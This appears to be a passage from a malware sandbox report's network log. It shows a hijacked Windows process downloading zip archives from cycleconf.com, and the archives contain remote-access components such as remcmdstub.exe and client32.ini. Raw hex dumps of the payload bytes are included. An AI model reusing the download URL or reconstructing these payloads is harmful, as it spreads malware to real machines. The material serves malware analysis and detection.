                                                                                                          2024-12-10 07:58:26 UTC8000INData Raw: cf 91 e7 0c 35 5b 22 a5 83 2b 9c f2 8b 57 f3 25 37 d3 3f d8 87 56 f5 f2 5f ee 25 aa c7 ba 34 13 8f 72 93 f9 8d 72 23 10 a9 a5 b5 16 c1 1c 26 b7 74 d3 03 80 61 d5 e6 ad 00 ce 56 62 09 ce 08 35 0e 66 47 43 dd c6 79 43 99 c2 ae b2 0d 0f 4e 08 c9 c0 cb 18 43 bb 8c 10 3a bf 13 57 5c 3c da b2 72 f8 3d 57 05 6f 0a 75 eb cc cb d1 40 6c e5 fd ba 7b 1e d0 05 b3 f0 ea c9 e5 87 31 a0 44 7f cf 04 bd b9 3e 8a 4b 1b 76 bf f9 33 40 f6 c9 01 dc 1c 34 da 9a 51 06 b8 f3 66 8d f5 63 83 a4 a7 d1 74 89 79 8c d2 33 b8 a7 c4 a0 6b 56 94 e1 43 b9 49 7a 1a 0d e6 66 33 8f 65 b6 f4 8c 13 1e 1b 5e ea 47 4a 14 8f 85 8c 54 a4 17 f2 10 3b 5e c8 a5 6f 0b 5d 5a 6d 45 9e 80 6c 55 6e 37 6f c9 9c ad 5b 87 49 cc 5b 66 a0 9d ca ba 5c 8c a4 24 68 b0 f2 00 19 ac 34 2f 3e c6 28 2f b7 59 19 ce 22
                                                                                                          Data Ascii: 5["+W%7?V_%4rr#&taVb5fGCyCNC:W\<r=Wou@l{1D>Kv3@4Qfcty3kVCIzf3e^GJT;^o]ZmElUn7o[I[f\$h4/>(/Y"
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: 19 0b 24 8f 93 3a 5b 94 48 5d b4 8b 48 5d 99 71 ec e2 3b 4c e6 b5 b0 f8 b7 6b 84 4e 95 9e 20 0e 3d e3 19 f6 cb 7f 3a 0c 3c 2d 9d bb fc 0e ce 8b aa 33 e4 1e e1 24 9e ea b5 7d 10 28 f2 e2 3d 87 87 5a 68 3b d8 16 5d a0 71 b3 b0 5c fc c8 f8 c5 07 57 e3 f6 c7 17 c7 e4 e3 90 e0 86 2f 03 fd 59 06 59 93 1d 50 0e 51 dd 90 94 cc b8 a3 18 d7 17 68 41 45 43 e5 69 56 75 9a 55 9e 64 f7 54 18 5a 9c ae 16 fb 3e 58 c8 f7 a1 8a c9 c5 de 65 de 1c 74 a4 a6 1c 5a 5a bb 4f 08 64 44 ed b2 91 fb f1 d7 69 64 89 55 ca 30 d5 0f f1 a9 be 2b 69 aa af 3b 4a 53 1d b7 f9 e4 fe 7f 51 a7 fa 7e f9 c5 4f f9 ed af d0 83 05 df 6c aa e3 06 89 a3 13 35 b1 df 88 5c bd 96 41 e4 aa f3 ec 2c 45 dd eb cb f9 7b 12 c7 ab d9 0f b2 4f 6c 5f a8 b2 cd 00 96 ee 94 ff 7c 8c e6 4d 9f 2b 42 43 4b ac 96 f9 99
                                                                                                          Data Ascii: $:[H]H]q;LkN =:<-3$}(=Zh;]q\W/YYPQhAECiVuUdTZ>XetZZOdDidU0+i;JSQ~Ol5\A,E{Ol_|M+BCK
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: 6e d7 23 bd f4 5d 9e 5e 0e f3 a1 f2 d5 37 fa 46 6d 56 e4 96 6b 53 1e af 37 63 74 6f 3a 12 1f 64 23 7d 06 4b e2 f4 17 85 54 f0 36 25 c3 6b 73 c4 48 88 c3 a4 92 60 4b 2f 12 94 94 7f 67 72 fe 35 8e de 24 c8 d2 87 04 25 e5 df 95 9c df e9 e8 43 02 af 4e 51 7e a8 73 64 1c 44 34 19 c4 c0 04 10 96 48 65 bb 5b b2 9f c6 3b 04 25 47 27 d4 c9 77 5b 42 85 38 53 9d 54 9f 7d c9 c0 1a a7 25 92 74 56 6c 75 fa ae ee dd a2 a4 fc 47 92 f3 2f 9d d6 ab 3f 46 f4 ed 8f 78 e6 63 c9 99 27 4e 4b 5a d2 8c 96 d4 4b 5a 52 f9 ef 25 83 10 7a 97 7f fb d7 8c c7 a9 5e ed 9f da 7b 49 fb 9a fc a7 7b b5 bf 77 fe f4 af c9 ff 8f e4 fc c5 3c bf 79 6b 02 42 98 7a 21 44 3c f3 d9 e4 cc 86 a9 49 fd 77 e7 37 e9 bf ce 5e ed bf af 0f 3e 0e 4c 89 8f d9 6c 0a 7a 23 d0 2e c2 95 ec e7 f8 dd 21 74 e1 ab 0c
                                                                                                          Data Ascii: n#]^7FmVkS7cto:d#}KT6%ksH`K/gr5$%CNQ~sdD4He[;%G'w[B8ST}%tVluG/?Fxc'NKZKZR%z^{I{w<ykBz!D<Iw7^>Llz#.!t
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: 41 13 72 47 1d 0f f9 00 94 c0 5d 50 eb 69 bc a3 90 27 8a 38 9e 69 32 4a 35 43 a9 55 4d ed 0e 79 1b ee 1f f6 3d 87 83 68 1d db e7 0e f7 c2 dc 64 2a f7 cb 35 63 7b da 2b f5 36 56 12 66 4a d6 de e6 90 07 fc 01 f6 59 81 56 b8 cc 4e ea af d5 63 13 d4 5f 68 bb 07 5b ae 14 ed 9d 39 55 e4 7c a9 29 41 5f e6 94 74 4b 31 2a b7 3e b1 9c 93 95 c4 2f 84 da 3c 5e ad 05 ab 26 3b 37 9b 64 d4 97 45 e5 36 27 96 cb 62 25 59 b8 73 c4 f0 26 5a 4b 42 9d 3d e6 b3 01 22 87 40 d4 27 82 c8 61 0f e4 00 ca 59 c9 1a 3b a1 d1 45 68 f8 7d 49 78 b9 04 6f 6f 22 bc 5c 56 92 0b 28 e5 51 9c 4a 11 8b 95 55 08 07 1e cc 6f f5 e8 da e2 2c 1d 76 96 94 04 6f 14 c1 3b 9e 08 6f 14 2b 19 f5 7f 0c 6f 34 c1 eb 48 84 37 9a 95 8c 06 78 df 14 1e 5b 00 4e 0e c6 a2 b9 34 e4 5c 1d 72 3c 6c 0f eb 7f f2 d5 db
                                                                                                          Data Ascii: ArG]Pi'8i2J5CUMy=hd*5c{+6VfJYVNc_h[9U|)A_tK1*>/<^&;7dE6'b%Ys&ZKB="@'aY;Eh}Ixoo"\V(QJUo,vo;o+o4H7x[N4\r<l
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: 85 28 8d 07 98 0b d3 07 48 68 0d 32 1e bf e5 ad f8 72 22 bd b4 47 96 8f 34 87 47 41 a9 7c d7 89 84 b0 9b 18 8d dd d5 96 ef e2 f9 ae 4e 8b ab 4b 4f 6b 83 a6 40 9f 8d c3 ee a8 58 cf 86 8d 87 1f 41 ab 17 7d 04 e1 d9 a4 5a 76 dc a3 56 ac c7 46 38 ec d8 88 f5 01 8c 97 52 b9 c6 a7 bb 9e ab 58 8b a3 e5 4d 0a a0 89 e1 17 cd 57 f4 0e bf a8 cf 7f b2 a0 24 97 e1 16 fc a4 b8 c0 01 a5 ac 4b 84 05 66 9d 91 8b 5a e8 1b 01 fe c6 c0 81 c2 2e 2e 7c 2d 9e 24 a0 b9 76 70 8c 7c ab 0d 1d 43 1f 86 66 fa 45 d4 60 34 09 10 fc c7 a7 5f 8d 8c 74 59 c2 b3 e5 b9 13 0d 8d 31 6b 8d 1e 0b 7f 3d 01 46 51 4f 18 b3 e2 40 e4 d2 89 14 88 43 57 9e 7d 10 20 cd 19 cc 28 78 78 cb 27 d4 cc 14 59 b5 fe 14 fa f6 0c 04 ef d0 b2 b7 e3 cf 56 78 d9 70 0a 5f aa 65 a7 3c 01 0c a0 b4 1b 1e 21 75 ef a9 9c
                                                                                                          Data Ascii: (Hh2r"G4GA|NKOk@XA}ZvVF8RXMW$KfZ..|-$vp|CfE`4_tY1k=FQO@CW} (xx'YVxp_e<!u
                                                                                                          2024-12-10 07:58:27 UTC8000INData Raw: d2 44 21 a5 bc cb ee b6 a9 d1 35 a4 48 d8 49 cb c6 3b 98 48 ea 83 fc 28 c9 c0 2a 0a 7e f9 54 1c a0 05 53 dd 9e 84 65 c6 ab bd a3 2f 33 6c b2 cc 6a b6 09 3e 1c fd 03 89 dd 5b a9 c6 4d 99 84 cd 9f b7 a4 49 ea ba 8d d8 30 79 83 48 da 08 49 2c ba 05 5b 9c 94 57 21 41 9c 4f 82 d7 41 89 07 6d c4 5b d1 d5 bd 1f e7 de c3 7d 2d cb 5f 53 0d b3 2c 54 b7 09 ac 70 4d ee 3b f7 99 d5 22 f7 64 c8 4d 76 35 ee 2f 28 b0 47 2f 70 37 ae fa 2f 1a fd 44 05 70 37 22 bf 28 1a f4 e3 e7 a1 41 99 b0 09 81 e9 ba 5f 6b d1 61 f5 30 3b 7a 68 b5 81 aa 10 ba 3d 20 72 04 1d 5a 76 2e 76 a2 8a 22 3c db d1 8a 5d be 97 45 8f 92 9e e6 38 3d 29 ea 12 7c 47 65 f2 cf 22 6c 25 ba 94 de d7 c0 27 d4 e3 4a ae 67 90 5e 4f 54 14 c3 ac 6c 1d 66 0d 0e 76 43 cb 03 1e 6f 50 d2 c7 ae dd 1b 79 b8 af 3b 4c 87
                                                                                                          Data Ascii: D!5HI;H(*~TSe/3lj>[MI0yHI,[W!AOAm[}-_S,TpM;"dMv5/(G/p7/Dp7"(A_ka0;zh= rZv.v"<]E8=)|Ge"l%'Jg^OTlfvCoPy;L


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.54985123.254.224.414432972C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-10 07:58:30 UTC55OUTGET /dwnld/2nd2_3.zip HTTP/1.1
                                                                                                          Host: cycleconf.com
                                                                                                          2024-12-10 07:58:31 UTC262INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 10 Dec 2024 07:58:31 GMT
                                                                                                          Server: Apache
                                                                                                          Upgrade: h2,h2c
                                                                                                          Connection: Upgrade, close
                                                                                                          Last-Modified: Wed, 24 Jul 2024 21:13:01 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 64489
                                                                                                          Vary: Accept-Encoding
                                                                                                          Content-Type: application/zip
                                                                                                          2024-12-10 07:58:31 UTC7930INData Raw: 50 4b 03 04 14 00 00 00 08 00 65 1f 9b 48 27 d4 1e 84 38 1f 00 00 78 49 00 00 0b 00 00 00 50 43 49 43 48 45 4b 2e 44 4c 4c ec 39 79 5c 53 c7 d6 73 93 80 61 11 52 d9 dc d0 40 a5 8a 28 dc 9b 0b 28 0a ca 16 95 16 34 25 08 2e a8 84 e4 02 91 6c bd 37 41 b0 5a 65 71 a1 11 b5 75 f7 f5 ab 58 a5 b5 4a 6b 17 17 5a 6b c5 a5 fa 6c b5 7d da be aa 75 6f ad e2 d2 aa cf d6 a5 5a f3 ce 4c 02 82 5b db 3f de ef fb 7d ef 73 70 e6 cc 59 e7 cc 99 99 33 73 63 c6 98 f9 48 8c 10 92 40 75 38 10 6a 40 ce 92 88 fe b8 9c 82 ea d3 fd 63 1f b4 c1 63 7f 48 03 95 be 3f 24 ab 48 2f c8 2d bc b9 90 d7 18 e5 5a 8d c9 64 b6 ca f3 39 39 6f 33 c9 f5 26 79 ea 08 b5 dc 68 d6 71 91 ed db 7b f6 70 d9 10 4a 3c b7 f4 0b d2 35 35 d7 3e 2f df 6c 8a 21 f0 cb a6 68 80 83 cc 37 9a 68 c2 e3 9a 7c 09 fd f3
                                                                                                          Data Ascii: PKeH'8xIPCICHEK.DLL9y\SsaR@((4%.l7AZequXJkZkl}uoZL[?}spY3scH@u8j@ccH?$H/-Zd99o3&yhq{pJ<55>/l!h7h|
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 51 ae fd ac 2a b8 c5 c6 da 66 87 5f ae a4 fc 63 5d ab 0f e4 ac 90 86 0e 13 7b 44 0c ec 1a 08 0e 08 ab 57 06 6b 13 e4 b8 55 2f f7 1a f8 fb d1 e5 07 a4 dc e5 0a b0 6b e3 13 a4 e8 ed 7e ef 3f de b0 0a b5 28 e1 83 67 b4 c5 fb 5e 38 3a 74 05 8a 3c 97 3f 74 30 44 20 8a 71 e5 fa 90 46 93 d0 d3 07 8c e9 3f f0 f8 0f 50 4b 03 04 14 00 00 00 08 00 24 a0 cd 56 00 ef 64 fe d7 7f 00 00 58 f7 00 00 0e 00 00 00 72 65 6d 63 6d 64 73 74 75 62 2e 65 78 65 ed fd 0b 40 54 55 d7 30 8e 9f b9 00 03 0c ce a8 a0 a8 a8 a3 e2 2d bc 0c 0c f7 19 60 50 06 31 41 47 91 41 54 54 12 10 08 81 e0 0c 6a 79 01 07 8c e1 38 69 a5 d5 d3 e5 49 53 cb d2 ca 32 2f 95 1a 88 81 a6 95 77 2d ad b0 4c 0f 8d 25 a6 29 2a 72 fe 6b ed 73 06 06 b5 9e e7 7d be ff fb 7d ef f7 fd 1a dd 67 df d6 de 7b ed b5 d7 5e
                                                                                                          Data Ascii: Q*f_c]{DWkU/k~?(g^8:t<?t0D qF?PK$VdXremcmdstub.exe@TU0-`P1AGATTjy8iIS2/w-L%)*rks}}g{^
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: e4 cb 92 ef 11 f2 dd 43 be b8 b8 61 f7 7f 03 9f 89 37 d0 bf 06 fc 20 c1 03 d8 98 1b ed 12 fc c7 eb 20 c1 f7 6e 43 bd 56 da 83 a9 c4 f3 42 ec e4 96 83 5c 53 98 27 45 dd 8c 97 eb cd b3 4c 6c 01 9e 1c 7d b2 ee 1c bf aa ec 63 69 69 a3 7b a0 2a 6b 7f a6 b9 b6 cd a5 f6 82 ab 44 be 03 bb 17 6a a1 dc 8c f5 5f 66 7e 05 e1 7a 21 9c 37 c0 35 f6 87 ee 50 db e8 2a 91 da 04 a8 fd 37 f5 fe 65 8a ca 27 c8 91 98 f6 1b 45 c5 3c 70 55 77 17 56 71 36 b2 8a b3 ed 86 6f d5 da ab f0 ad 38 ae a8 78 06 04 f8 58 cd 4d eb 6b b8 5a 8b d8 81 80 8a 95 8b 20 d0 36 a6 51 37 6d 81 42 b1 6f bf 62 5f 99 2f 8c 78 96 46 05 72 8a 62 5f 45 6d 38 78 f3 dc 6a 5b a4 69 d6 ca 95 90 42 5b ab 78 5a 05 69 38 ff ca a7 c7 03 a4 0d c9 06 b4 ad 22 14 26 74 db 41 e8 b9 83 50 72 07 a1 f0 0e a4 64 53 93 3b
                                                                                                          Data Ascii: Ca7 nCVB\S'ELl}cii{*kDj_f~z!75P*7e'E<pUwVq6o8xXMkZ 6Q7mBob_/xFrb_Em8xj[iB[xZi8"&tAPrdS;
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 75 39 e7 0b 1d 92 6c 43 a3 5d 4f b5 8f 35 1b 2e 82 6f 03 8b 9f 2b f8 69 b6 3b 5f 3a 62 bc 12 3f d0 53 a6 08 a3 14 66 de d7 1e bf 29 97 98 65 96 1a b9 b6 be f8 ca e3 87 e4 92 24 d9 2c 6d 6d 89 0b 46 8b b1 51 b9 90 2b 76 c7 dd 74 d4 45 61 11 57 bf 6f da a7 01 67 c9 ba c6 73 d9 04 da 87 a9 cb 13 a7 05 d4 d2 03 c1 c8 c0 80 db 3c 96 9d b2 07 95 1a 00 10 f5 70 71 f8 c2 a5 f8 3e 44 71 3d 7e ec 29 dc 82 99 cc 09 fe 65 40 5b 91 8c 71 b5 4f 66 ea 2c ac 82 0e b2 b0 ae f4 80 04 ba 1b 6b aa 6d 1f 37 6f d7 c0 88 fb f1 3e c4 69 3d 7e ec 3d f6 61 45 d7 e3 c7 ee b1 0f ab ba 1e 3f 0d 86 8b fc 26 37 41 dc 6a 68 d4 d4 58 96 34 8a 14 15 a7 c9 e1 6a a3 d9 2d 4f c2 de 42 3d 17 c3 45 5c a2 8e b7 43 f1 f8 e2 52 ab e5 ae 8c f6 80 1a c1 dc e8 ae d4 dc 87 99 34 c7 9a 74 d2 3a 6e 0e
                                                                                                          Data Ascii: u9lC]O5.o+i;_:b?Sf)e$,mmFQ+vtEaWogs<pq>Dq=~)e@[qOf,km7o>i=~=aE?&7AjhX4j-OB=E\CR4t:n
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 35 31 17 17 03 6e 3c 5d c6 67 52 d4 09 69 4a 41 0e 01 c9 34 2c 9c 9b 55 84 b5 06 86 c2 ec a8 4d d8 9e 7f 1e 0d f5 88 cb 7a cc 3c 6f 5e 56 b1 11 98 1e ab 5c 23 9d 9a 55 3c 3f b7 a0 83 5d 40 a0 38 95 eb 08 ec ea 92 9a 9b 99 35 36 27 a3 78 6a 21 61 bf 31 8b e8 2c 6a a4 24 71 6c 52 46 11 df fe 80 f1 3c 49 7b dc d4 42 47 02 ea 37 a0 16 94 3f 16 58 3f 77 6e 46 7e b2 43 25 22 42 92 98 95 51 9a f5 40 b8 14 f0 14 ca 2d 2c 8e cf c2 b3 db 2c 07 be bd 44 ce 07 94 de 0f f6 41 c0 22 83 f4 f4 07 f9 33 95 fa 16 6b f6 b0 08 aa 10 29 c7 53 7e 6c a1 19 79 e1 27 e0 11 40 0c da fd c9 fb 51 8c 2d c8 4c 2e ca 2d e0 01 af 63 9e 58 fa d4 45 45 59 d4 5c be b7 64 14 d3 e6 22 64 c1 54 ea 18 b4 79 7e 16 fd 40 35 bf 24 dc cb f7 54 8a 7a 4b 32 d9 9c 55 bc c8 98 55 4c 58 b9 60 2e 8f 06
                                                                                                          Data Ascii: 51n<]gRiJA4,UMz<o^V\#U<?]@856'xj!a1,j$qlRF<I{BG7?X?wnF~C%"BQ@-,,DA"3k)S~ly'@Q-L.-cXEEY\d"dTy~@5$TzK2UULX`.
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: f0 b6 be 3c 51 ba 71 8f fe bd 88 37 bf d3 8b 1b 23 cd 6d 51 4b 52 d6 cc b8 36 d1 7f f1 c1 dd d3 7a 7d 51 f3 ed be 69 dd 5f be e4 77 f9 58 ad b6 39 7d d5 78 d9 80 7f 1e bd be ef f4 c9 ec 49 33 8b 43 9f aa 5b 7e e2 25 d9 9a f7 b7 c4 4d f2 6d f0 fe b6 c7 07 fd 82 ba 74 0b af d9 a1 2b bd 62 36 52 2a 69 d7 5e bf d6 73 3f 4c 6c 93 95 0f 0d 9c f4 04 5d 20 91 17 0d 2d 4f c9 7b 79 ec 73 1b 97 9d bb 17 f3 79 cf 7e b1 9f 7e c5 be b5 6c e5 da db f7 96 b5 64 54 59 a9 68 ce 53 74 ee de a9 1d 1b 2f 3e db f5 3f 3c 90 5b f2 d9 b3 67 de ca 9f 3e 2e 3b ee a9 d5 27 9f 59 5d 1c bb aa e7 fe ff ab 0f e4 1c 53 05 e3 b6 3f 7e 98 fd ae e6 7c 5d f2 b4 69 7b f6 77 37 3f a5 ea 3b f5 8b 4f 62 8c 31 9f 54 df 78 dc 7d 6e cd 8c 74 e6 b4 b9 77 c9 5e 86 1b 77 cd e7 fc e4 1e 83 7a 05 5d 2a
                                                                                                          Data Ascii: <Qq7#mQKR6z}Qi_wX9}xI3C[~%Mmt+b6R*i^s?Ll] -O{ysy~~ldTYhSt/>?<[g>.;'Y]S?~|]i{w7?;Ob1Tx}ntw^wz]*
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 4a 2e d3 1c fd 50 74 b4 52 03 e3 23 72 5f aa 1f 36 76 9b 0f e6 c5 1a 8e 59 a2 c9 e9 a3 cf fc 3a 39 13 53 85 c4 d4 a4 31 f9 52 a1 58 92 c2 9c 9c 10 93 c2 ea 87 19 20 56 9a be 36 9b 83 b1 59 f6 23 b9 76 1c cc 96 45 68 64 86 34 ca 35 f0 15 c5 3e e5 d3 6e e6 ff d0 df de 7e e8 91 e4 5d 17 a5 e4 55 58 10 62 18 4c 0d c0 c6 63 7e e5 63 cb 7d e6 7b c5 4b 24 a9 8e 36 36 19 19 19 d6 c9 5d dd 5a c3 fb b8 4d ea cc 84 94 d4 34 9b 18 71 92 0d d4 07 ae 62 b8 86 e1 f2 45 ab 37 12 81 d1 98 fd 68 8c 67 0d e9 98 a0 6b cc 24 12 75 0a 16 88 4d ea aa 63 e4 f9 3e ff b0 03 38 ac b4 7f d0 85 04 d3 42 8a eb 93 48 9d 54 32 06 7a 6d 66 4a 3e 99 04 b8 e4 f9 8d b3 18 2f f7 4b f6 8f a8 67 18 ee bb 7d a9 dd 76 f3 9a 3d 3f fd 5a a2 61 60 9d 70 74 e3 c9 4b 5f b6 b0 c3 c6 3c 48 9e 10 55 5e
                                                                                                          Data Ascii: J.PtR#r_6vY:9S1RX V6Y#vEhd45>n~]UXbLc~c}{K$66]ZM4qbE7hgk$uMc>8BHT2zmfJ>/Kg}v=?Za`ptK_<HU^
                                                                                                          2024-12-10 07:58:31 UTC8000INData Raw: 8d c2 0b 44 39 0f 52 79 6c 77 2d 54 44 e1 29 62 0b 25 4b 7e 68 5b 0f 31 6f 8f c1 3b 8d 66 d1 62 78 60 38 45 96 b5 12 07 b6 22 4a 58 36 5e 52 b1 99 b6 ad 9a 84 b6 32 66 57 59 78 37 b4 f4 80 ee 64 85 69 26 27 5d 4e 8a 22 e5 ec 95 64 0c 48 fd 0c de 34 d1 30 97 c2 53 34 19 9a d2 8f 3e 80 20 a4 36 93 76 97 76 91 21 e0 73 08 fa 27 c0 cc e4 b8 cb 71 91 ba 6c c9 3c ca ec 60 0f b0 bd 6c c5 ad 4d 40 d1 20 39 51 f4 01 0a c6 86 cf fb c3 05 8f 92 22 42 d3 23 0b d9 e9 39 19 91 19 04 ee f8 a1 3d 70 95 c9 88 58 aa ab 07 aa c0 42 74 40 11 fb c5 57 0c 74 15 c9 c4 a8 73 a3 d6 e7 d1 a1 0f 9d 0d 73 dd 2c 98 1b 60 30 b7 4b 87 b9 6b 0a c8 13 e7 eb 56 e3 85 fa 7c bc 30 e0 e2 05 25 01 2f cc a6 e3 85 55 0c 28 56 2d a0 54 d2 e1 99 00 59 5f 84 97 e4 f5 a5 74 68 ab 4a eb 97 40 18 37
                                                                                                          Data Ascii: D9Rylw-TD)b%K~h[1o;fbx`8E"JX6^R2fWYx7di&']N"dH40S4> 6vv!s'ql<`lM@ 9Q"B#9=pXBt@Wtss,`0KkV|0%/U(V-TY_thJ@7
                                                                                                          2024-12-10 07:58:31 UTC559INData Raw: 00 20 00 00 00 00 00 00 00 50 43 49 43 48 45 4b 2e 44 4c 4c 0a 00 20 00 00 00 00 00 01 00 18 00 00 03 cc 01 20 a0 d1 01 61 c9 ee ed 5b 37 da 01 cd 15 5c 8c 17 35 da 01 50 4b 01 02 1f 00 14 00 00 00 08 00 24 a0 cd 56 00 ef 64 fe d7 7f 00 00 58 f7 00 00 0e 00 24 00 00 00 00 00 00 00 20 00 00 00 61 1f 00 00 72 65 6d 63 6d 64 73 74 75 62 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 2a 32 6a a6 18 9e d9 01 85 83 92 f3 5b 37 da 01 9a b4 5c 8c 17 35 da 01 50 4b 01 02 1f 00 14 00 00 00 08 00 19 92 38 57 f5 75 1d 3a 91 01 00 00 7d 02 00 00 0c 00 24 00 00 00 00 00 00 00 20 00 00 00 64 9f 00 00 63 6c 69 65 6e 74 33 32 2e 69 6e 69 0a 00 20 00 00 00 00 00 01 00 18 00 30 ba bb 24 fa ee d9 01 6a 23 97 b5 5b 37 da 01 e5 1a 6e 1e 72 ee d9 01 50 4b 01 02 1f 00 14 00 00
                                                                                                          Data Ascii: PCICHEK.DLL a[7\5PK$VdX$ aremcmdstub.exe *2j[7\5PK8Wu:}$ dclient32.ini 0$j#[7nrPK


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.54985723.254.224.414432972C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-10 07:58:33 UTC55OUTGET /dwnld/2nd2_4.zip HTTP/1.1
                                                                                                          Host: cycleconf.com
                                                                                                          2024-12-10 07:58:33 UTC263INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 10 Dec 2024 07:58:33 GMT
                                                                                                          Server: Apache
                                                                                                          Upgrade: h2,h2c
                                                                                                          Connection: Upgrade, close
                                                                                                          Last-Modified: Wed, 24 Jul 2024 21:12:34 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 787082
                                                                                                          Vary: Accept-Encoding
                                                                                                          Content-Type: application/zip
                                                                                                          2024-12-10 07:58:33 UTC7929INData Raw: 50 4b 03 04 14 00 00 00 08 00 2c 61 87 4f 09 a5 f9 52 62 03 00 00 00 0a 00 00 0a 00 00 00 6e 65 74 6d 73 67 2e 64 6c 6c ed 56 4d 48 54 51 14 fe de cc 18 8d 7f 18 44 d1 aa 27 18 d5 a2 c1 89 0a 83 50 33 15 14 ff 50 b3 08 a1 5e 33 af 71 c2 79 33 bd 37 96 1a c8 04 12 41 06 d6 22 5a 56 bb 16 d5 2c 5a 68 10 b4 6c 63 8b 56 15 51 d1 a2 5d b5 6d 11 d6 77 cf dc 19 5f a3 22 41 bb 3a 8f 73 7f be 7b fe ee 39 f7 bd fb 7a 4f cd 23 08 20 44 fe f9 13 58 40 81 5a b1 31 29 d9 da 9d 4f 6b f1 24 bc 54 bf 60 f4 2c d5 0f 8f 25 3d 33 e3 a6 13 ae 95 32 63 96 e3 a4 b3 e6 59 db 74 27 1c 33 e9 98 ed fd 43 66 2a 1d b7 23 35 35 95 0d da c6 c1 2b 47 3e 5c f8 38 38 57 64 fb fa c3 b9 8c f4 03 37 54 3f 98 8c 8d 29 bc dc f7 40 07 d0 63 04 f0 f8 71 df 93 22 f6 11 81 fa 2a a3 76 ab 4c 36 fb
                                                                                                          Data Ascii: PK,aORbnetmsg.dllVMHTQD'P3P^3qy37A"ZV,ZhlcVQ]mw_"A:s{9zO# DX@Z1)Ok$T`,%=32cYt'3Cf*#55+G>\88Wd7T?)@cq"*vL6
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: 29 26 9d 8f b0 e0 73 a5 31 b7 d2 58 be 0c aa fb 33 15 dd 2c 44 77 ec ae 01 aa fb 73 2d d3 7f bd 4b ae 2e 9f 6c bf 8a 13 2a ec 93 6b bc 4d 5b f8 09 56 58 69 c3 df a8 b9 7e 64 e1 3e 39 b7 d4 1a 35 4e 74 b8 cc 95 a3 fd bf 55 21 dc 08 71 fb 5d 89 ad fc 3b 6d 2b 8f 91 8b 17 9a 45 6f 66 b1 c7 70 a4 88 74 a3 a9 93 59 c2 2c ec 1e 65 cc 9c fd 41 cb d9 f1 3b e5 6a 99 39 a5 3e 29 aa f3 17 6d a1 df dd a9 a9 ce 5f b5 d5 11 58 ae 00 f2 ee df 21 53 e3 4f ea 10 0b ef 4c ec 10 af 69 3b c4 14 96 d9 cf f5 48 9a 27 1a 54 1e c5 58 8e 0b b7 b7 f0 6e 71 1f 79 04 f7 43 5d a1 e8 ae 3c 5a 14 7a 48 79 19 28 cc 4e 95 fe 0a a4 ff 87 bc 44 bd ef af ec 7b b4 b2 fa 6e 5e 12 bb aa 61 61 6a b6 4f 0b be 98 81 27 ee 37 5f df 79 40 af d9 5f 8c 34 5d 66 fb 21 f0 c2 d6 4d 15 97 f0 8e 5d 6b be
                                                                                                          Data Ascii: )&s1X3,Dws-K.l*kM[VXi~d>95NtU!q];m+EofptY,eA;j9>)m_X!SOLi;H'TXnqyC]<ZzHy(ND{n^aajO'7_y@_4]f!M]k
                                                                                                          2024-12-10 07:58:33 UTC8000INData Raw: d5 6e 7b e3 b9 3f 96 97 b6 a4 e8 af 9a fa d2 6e 9b a2 f3 f6 ef 0f 79 5f a6 e8 0f 25 7c d2 ac 42 1c 9a 80 6f 08 4c a5 8b 98 1c 8d 5c 72 fb 6f 4e 6e ff ff 8b f6 a0 f6 2b 1d a7 11 fd ed e1 95 e4 f3 ef d8 4b 0f ee 0f 15 87 c8 cc 0a 6a 5d d5 7c ab 61 40 10 f6 7b 61 c5 e2 3b e2 3d 3c ea be 05 d9 ca 69 72 c4 1e 1f ca 86 fa 9b 66 18 39 b1 e9 20 09 f7 f0 8f 9b e8 af 48 39 7a 1e b7 be 8c a0 39 07 1c bb 57 99 04 40 dc e3 15 1f 37 37 7d a6 8f 1a 73 85 50 8f 1c 8f 07 21 5c 9f 87 dd c5 f2 03 3c 51 68 68 34 34 c2 f8 c7 6e 7a 16 70 39 c0 52 8d 07 27 c5 7b 8c e2 7c 1e 73 0d dd 86 ee 68 e6 f0 9c 66 03 b4 40 1f 68 33 2d 52 04 af 8a 70 d7 ea dc 1b f4 9c c1 79 1e e0 f1 f2 91 b5 3d ab 66 37 5d d6 8b 6f 1b 0e 19 0e 15 79 dc e2 05 a1 e4 3c 99 00 30 e2 01 03 bd 09 3b 27 d4 13 1c
                                                                                                          Data Ascii: n{?ny_%|BoL\roNn+Kj]|a@{a;=<irf9 H9z9W@77}sP!\<Qhh44nzp9R'{|shf@h3-Rpy=f7]oy<0;'
